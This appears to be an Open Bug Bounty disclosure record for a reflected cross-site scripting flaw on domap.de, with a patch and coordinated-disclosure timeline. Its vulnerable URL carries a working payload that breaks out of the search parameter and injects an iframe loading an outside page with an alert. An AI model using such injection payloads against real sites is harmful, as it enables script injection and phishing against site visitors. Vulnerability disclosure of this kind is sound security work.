domap.de XSS vulnerability

2015-07-10T11:29:00
ID OBB:71313
Type openbugbounty
Reporter sToRm
Modified 2016-01-30T21:09:00

Description

Vulnerable URL:
https://www.domap.de/wps/portal/dortmund/produktsuche?p_searchTerm=xxx%22%3E%3Ciframe%20src=https://ssl-account.com/sicherheit-online.org/xternal/storm.html%20onload=alert%28%27XSSPOSED%27%29%3E&p;_searchType=search&p;_start=0
Details:

Description| Value
---|---
Patched:| Yes, at 30.01.2016
Latest check for patch:| 30.01.2016 21:09 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 936378
Google Pagerank| 5
VIP website status:| No
Check domap.de SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 10 July, 2015 11:29 GMT
Vulnerability existence verified and confirmed| 10 July, 2015 11:31 GMT
Vulnerability patched by the website owner| 30 January, 2016 21:09 GMT